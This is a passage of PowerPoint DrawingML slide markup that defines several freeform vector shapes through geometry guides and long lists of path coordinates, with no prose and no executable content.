                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="142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5" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3221038" y="1758950"/>
                <a:ext cx="225425" cy="215900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 626"/>
                  <a:gd name="T1" fmla="*/ 331 h 600"/>
                  <a:gd name="T2" fmla="*/ 6 w 626"/>
                  <a:gd name="T3" fmla="*/ 262 h 600"/>
                  <a:gd name="T4" fmla="*/ 0 w 626"/>
                  <a:gd name="T5" fmla="*/ 226 h 600"/>
                  <a:gd name="T6" fmla="*/ 0 w 626"/>
                  <a:gd name="T7" fmla="*/ 194 h 600"/>
                  <a:gd name="T8" fmla="*/ 32 w 626"/>
                  <a:gd name="T9" fmla="*/ 131 h 600"/>
                  <a:gd name="T10" fmla="*/ 53 w 626"/>
                  <a:gd name="T11" fmla="*/ 100 h 600"/>
                  <a:gd name="T12" fmla="*/ 79 w 626"/>
                  <a:gd name="T13" fmla="*/ 74 h 600"/>
                  <a:gd name="T14" fmla="*/ 168 w 626"/>
                  <a:gd name="T15" fmla="*/ 11 h 600"/>
                  <a:gd name="T16" fmla="*/ 205 w 626"/>
                  <a:gd name="T17" fmla="*/ 0 h 600"/>
                  <a:gd name="T18" fmla="*/ 236 w 626"/>
                  <a:gd name="T19" fmla="*/ 0 h 600"/>
                  <a:gd name="T20" fmla="*/ 294 w 626"/>
                  <a:gd name="T21" fmla="*/ 21 h 600"/>
                  <a:gd name="T22" fmla="*/ 320 w 626"/>
                  <a:gd name="T23" fmla="*/ 42 h 600"/>
                  <a:gd name="T24" fmla="*/ 541 w 626"/>
                  <a:gd name="T25" fmla="*/ 284 h 600"/>
                  <a:gd name="T26" fmla="*/ 583 w 626"/>
                  <a:gd name="T27" fmla="*/ 331 h 600"/>
                  <a:gd name="T28" fmla="*/ 625 w 626"/>
                  <a:gd name="T29" fmla="*/ 352 h 600"/>
                  <a:gd name="T30" fmla="*/ 525 w 626"/>
                  <a:gd name="T31" fmla="*/ 446 h 600"/>
                  <a:gd name="T32" fmla="*/ 499 w 626"/>
                  <a:gd name="T33" fmla="*/ 431 h 600"/>
                  <a:gd name="T34" fmla="*/ 473 w 626"/>
                  <a:gd name="T35" fmla="*/ 415 h 600"/>
                  <a:gd name="T36" fmla="*/ 473 w 626"/>
                  <a:gd name="T37" fmla="*/ 462 h 600"/>
                  <a:gd name="T38" fmla="*/ 467 w 626"/>
                  <a:gd name="T39" fmla="*/ 494 h 600"/>
                  <a:gd name="T40" fmla="*/ 441 w 626"/>
                  <a:gd name="T41" fmla="*/ 530 h 600"/>
                  <a:gd name="T42" fmla="*/ 410 w 626"/>
                  <a:gd name="T43" fmla="*/ 562 h 600"/>
                  <a:gd name="T44" fmla="*/ 352 w 626"/>
                  <a:gd name="T45" fmla="*/ 593 h 600"/>
                  <a:gd name="T46" fmla="*/ 326 w 626"/>
                  <a:gd name="T47" fmla="*/ 599 h 600"/>
                  <a:gd name="T48" fmla="*/ 300 w 626"/>
                  <a:gd name="T49" fmla="*/ 593 h 600"/>
                  <a:gd name="T50" fmla="*/ 247 w 626"/>
                  <a:gd name="T51" fmla="*/ 572 h 600"/>
                  <a:gd name="T52" fmla="*/ 226 w 626"/>
                  <a:gd name="T53" fmla="*/ 556 h 600"/>
                  <a:gd name="T54" fmla="*/ 205 w 626"/>
                  <a:gd name="T55" fmla="*/ 535 h 600"/>
                  <a:gd name="T56" fmla="*/ 168 w 626"/>
                  <a:gd name="T57" fmla="*/ 478 h 600"/>
                  <a:gd name="T58" fmla="*/ 158 w 626"/>
                  <a:gd name="T59" fmla="*/ 452 h 600"/>
                  <a:gd name="T60" fmla="*/ 153 w 626"/>
                  <a:gd name="T61" fmla="*/ 425 h 600"/>
                  <a:gd name="T62" fmla="*/ 163 w 626"/>
                  <a:gd name="T63" fmla="*/ 368 h 600"/>
                  <a:gd name="T64" fmla="*/ 179 w 626"/>
                  <a:gd name="T65" fmla="*/ 341 h 600"/>
                  <a:gd name="T66" fmla="*/ 242 w 626"/>
                  <a:gd name="T67" fmla="*/ 241 h 600"/>
                  <a:gd name="T68" fmla="*/ 252 w 626"/>
                  <a:gd name="T69" fmla="*/ 215 h 600"/>
                  <a:gd name="T70" fmla="*/ 257 w 626"/>
                  <a:gd name="T71" fmla="*/ 194 h 600"/>
                  <a:gd name="T72" fmla="*/ 242 w 626"/>
                  <a:gd name="T73" fmla="*/ 152 h 600"/>
                  <a:gd name="T74" fmla="*/ 216 w 626"/>
                  <a:gd name="T75" fmla="*/ 131 h 600"/>
                  <a:gd name="T76" fmla="*/ 195 w 626"/>
                  <a:gd name="T77" fmla="*/ 126 h 600"/>
                  <a:gd name="T78" fmla="*/ 173 w 626"/>
                  <a:gd name="T79" fmla="*/ 126 h 600"/>
                  <a:gd name="T80" fmla="*/ 147 w 626"/>
                  <a:gd name="T81" fmla="*/ 147 h 600"/>
                  <a:gd name="T82" fmla="*/ 121 w 626"/>
                  <a:gd name="T83" fmla="*/ 178 h 600"/>
                  <a:gd name="T84" fmla="*/ 121 w 626"/>
                  <a:gd name="T85" fmla="*/ 194 h 600"/>
                  <a:gd name="T86" fmla="*/ 142 w 626"/>
                  <a:gd name="T87" fmla="*/ 241 h 600"/>
                  <a:gd name="T88" fmla="*/ 58 w 626"/>
                  <a:gd name="T89" fmla="*/ 341 h 600"/>
                  <a:gd name="T90" fmla="*/ 315 w 626"/>
                  <a:gd name="T91" fmla="*/ 284 h 600"/>
                  <a:gd name="T92" fmla="*/ 300 w 626"/>
                  <a:gd name="T93" fmla="*/ 310 h 600"/>
                  <a:gd name="T94" fmla="*/ 279 w 626"/>
                  <a:gd name="T95" fmla="*/ 347 h 600"/>
                  <a:gd name="T96" fmla="*/ 273 w 626"/>
                  <a:gd name="T97" fmla="*/ 373 h 600"/>
                  <a:gd name="T98" fmla="*/ 300 w 626"/>
                  <a:gd name="T99" fmla="*/ 431 h 600"/>
                  <a:gd name="T100" fmla="*/ 320 w 626"/>
                  <a:gd name="T101" fmla="*/ 452 h 600"/>
                  <a:gd name="T102" fmla="*/ 342 w 626"/>
                  <a:gd name="T103" fmla="*/ 462 h 600"/>
                  <a:gd name="T104" fmla="*/ 368 w 626"/>
                  <a:gd name="T105" fmla="*/ 467 h 600"/>
                  <a:gd name="T106" fmla="*/ 389 w 626"/>
                  <a:gd name="T107" fmla="*/ 452 h 600"/>
                  <a:gd name="T108" fmla="*/ 410 w 626"/>
                  <a:gd name="T109" fmla="*/ 431 h 600"/>
                  <a:gd name="T110" fmla="*/ 420 w 626"/>
                  <a:gd name="T111" fmla="*/ 399 h 600"/>
                  <a:gd name="T112" fmla="*/ 420 w 626"/>
                  <a:gd name="T113" fmla="*/ 383 h 600"/>
                  <a:gd name="T114" fmla="*/ 420 w 626"/>
                  <a:gd name="T115" fmla="*/ 368 h 600"/>
                  <a:gd name="T116" fmla="*/ 399 w 626"/>
                  <a:gd name="T117" fmla="*/ 331 h 600"/>
                  <a:gd name="T118" fmla="*/ 326 w 626"/>
                  <a:gd name="T119" fmla="*/ 247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26" h="600">
                    <a:moveTo>
                      <a:pt x="48" y="331"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="331"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="315" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="284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6" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3303588" y="1625600"/>
                <a:ext cx="206375" cy="242888"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 111 w 574"/>
                  <a:gd name="T1" fmla="*/ 0 h 673"/>
                  <a:gd name="T2" fmla="*/ 573 w 574"/>
                  <a:gd name="T3" fmla="*/ 582 h 673"/>
                  <a:gd name="T4" fmla="*/ 462 w 574"/>
                  <a:gd name="T5" fmla="*/ 672 h 673"/>
                  <a:gd name="T6" fmla="*/ 0 w 574"/>
                  <a:gd name="T7" fmla="*/ 89 h 673"/>
                  <a:gd name="T8" fmla="*/ 111 w 574"/>
                  <a:gd name="T9" fmla="*/ 0 h 6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4" h="673">
                    <a:moveTo>
                      <a:pt x="111" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="573" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111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63" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3479800" y="1473200"/>
                <a:ext cx="244475" cy="271463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 678"/>
                  <a:gd name="T1" fmla="*/ 593 h 752"/>
                  <a:gd name="T2" fmla="*/ 409 w 678"/>
                  <a:gd name="T3" fmla="*/ 614 h 752"/>
                  <a:gd name="T4" fmla="*/ 446 w 678"/>
                  <a:gd name="T5" fmla="*/ 620 h 752"/>
                  <a:gd name="T6" fmla="*/ 488 w 678"/>
                  <a:gd name="T7" fmla="*/ 599 h 752"/>
                  <a:gd name="T8" fmla="*/ 530 w 678"/>
                  <a:gd name="T9" fmla="*/ 546 h 752"/>
                  <a:gd name="T10" fmla="*/ 530 w 678"/>
                  <a:gd name="T11" fmla="*/ 510 h 752"/>
                  <a:gd name="T12" fmla="*/ 514 w 678"/>
                  <a:gd name="T13" fmla="*/ 473 h 752"/>
                  <a:gd name="T14" fmla="*/ 482 w 678"/>
                  <a:gd name="T15" fmla="*/ 441 h 752"/>
                  <a:gd name="T16" fmla="*/ 446 w 678"/>
                  <a:gd name="T17" fmla="*/ 426 h 752"/>
                  <a:gd name="T18" fmla="*/ 398 w 678"/>
                  <a:gd name="T19" fmla="*/ 426 h 752"/>
                  <a:gd name="T20" fmla="*/ 283 w 678"/>
                  <a:gd name="T21" fmla="*/ 452 h 752"/>
                  <a:gd name="T22" fmla="*/ 199 w 678"/>
                  <a:gd name="T23" fmla="*/ 457 h 752"/>
                  <a:gd name="T24" fmla="*/ 131 w 678"/>
                  <a:gd name="T25" fmla="*/ 441 h 752"/>
                  <a:gd name="T26" fmla="*/ 73 w 678"/>
                  <a:gd name="T27" fmla="*/ 394 h 752"/>
                  <a:gd name="T28" fmla="*/ 20 w 678"/>
                  <a:gd name="T29" fmla="*/ 316 h 752"/>
                  <a:gd name="T30" fmla="*/ 10 w 678"/>
                  <a:gd name="T31" fmla="*/ 189 h 752"/>
                  <a:gd name="T32" fmla="*/ 47 w 678"/>
                  <a:gd name="T33" fmla="*/ 116 h 752"/>
                  <a:gd name="T34" fmla="*/ 120 w 678"/>
                  <a:gd name="T35" fmla="*/ 52 h 752"/>
                  <a:gd name="T36" fmla="*/ 199 w 678"/>
                  <a:gd name="T37" fmla="*/ 11 h 752"/>
                  <a:gd name="T38" fmla="*/ 283 w 678"/>
                  <a:gd name="T39" fmla="*/ 0 h 752"/>
                  <a:gd name="T40" fmla="*/ 357 w 678"/>
                  <a:gd name="T41" fmla="*/ 26 h 752"/>
                  <a:gd name="T42" fmla="*/ 430 w 678"/>
                  <a:gd name="T43" fmla="*/ 105 h 752"/>
                  <a:gd name="T44" fmla="*/ 283 w 678"/>
                  <a:gd name="T45" fmla="*/ 152 h 752"/>
                  <a:gd name="T46" fmla="*/ 251 w 678"/>
                  <a:gd name="T47" fmla="*/ 132 h 752"/>
                  <a:gd name="T48" fmla="*/ 199 w 678"/>
                  <a:gd name="T49" fmla="*/ 132 h 752"/>
                  <a:gd name="T50" fmla="*/ 167 w 678"/>
                  <a:gd name="T51" fmla="*/ 152 h 752"/>
                  <a:gd name="T52" fmla="*/ 147 w 678"/>
                  <a:gd name="T53" fmla="*/ 184 h 752"/>
                  <a:gd name="T54" fmla="*/ 141 w 678"/>
                  <a:gd name="T55" fmla="*/ 216 h 752"/>
                  <a:gd name="T56" fmla="*/ 162 w 678"/>
                  <a:gd name="T57" fmla="*/ 257 h 752"/>
                  <a:gd name="T58" fmla="*/ 204 w 678"/>
                  <a:gd name="T59" fmla="*/ 299 h 752"/>
                  <a:gd name="T60" fmla="*/ 236 w 678"/>
                  <a:gd name="T61" fmla="*/ 305 h 752"/>
                  <a:gd name="T62" fmla="*/ 404 w 678"/>
                  <a:gd name="T63" fmla="*/ 279 h 752"/>
                  <a:gd name="T64" fmla="*/ 482 w 678"/>
                  <a:gd name="T65" fmla="*/ 273 h 752"/>
                  <a:gd name="T66" fmla="*/ 545 w 678"/>
                  <a:gd name="T67" fmla="*/ 284 h 752"/>
                  <a:gd name="T68" fmla="*/ 593 w 678"/>
                  <a:gd name="T69" fmla="*/ 316 h 752"/>
                  <a:gd name="T70" fmla="*/ 629 w 678"/>
                  <a:gd name="T71" fmla="*/ 363 h 752"/>
                  <a:gd name="T72" fmla="*/ 677 w 678"/>
                  <a:gd name="T73" fmla="*/ 504 h 752"/>
                  <a:gd name="T74" fmla="*/ 651 w 678"/>
                  <a:gd name="T75" fmla="*/ 583 h 752"/>
                  <a:gd name="T76" fmla="*/ 540 w 678"/>
                  <a:gd name="T77" fmla="*/ 693 h 752"/>
                  <a:gd name="T78" fmla="*/ 441 w 678"/>
                  <a:gd name="T79" fmla="*/ 740 h 752"/>
                  <a:gd name="T80" fmla="*/ 357 w 678"/>
                  <a:gd name="T81" fmla="*/ 746 h 752"/>
                  <a:gd name="T82" fmla="*/ 251 w 678"/>
                  <a:gd name="T83" fmla="*/ 683 h 752"/>
                  <a:gd name="T84" fmla="*/ 331 w 678"/>
                  <a:gd name="T85" fmla="*/ 541 h 7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678" h="752">
                    <a:moveTo>
                      <a:pt x="346" y="557"/>
                    </a:moveTo>
                    <a:lnTo>
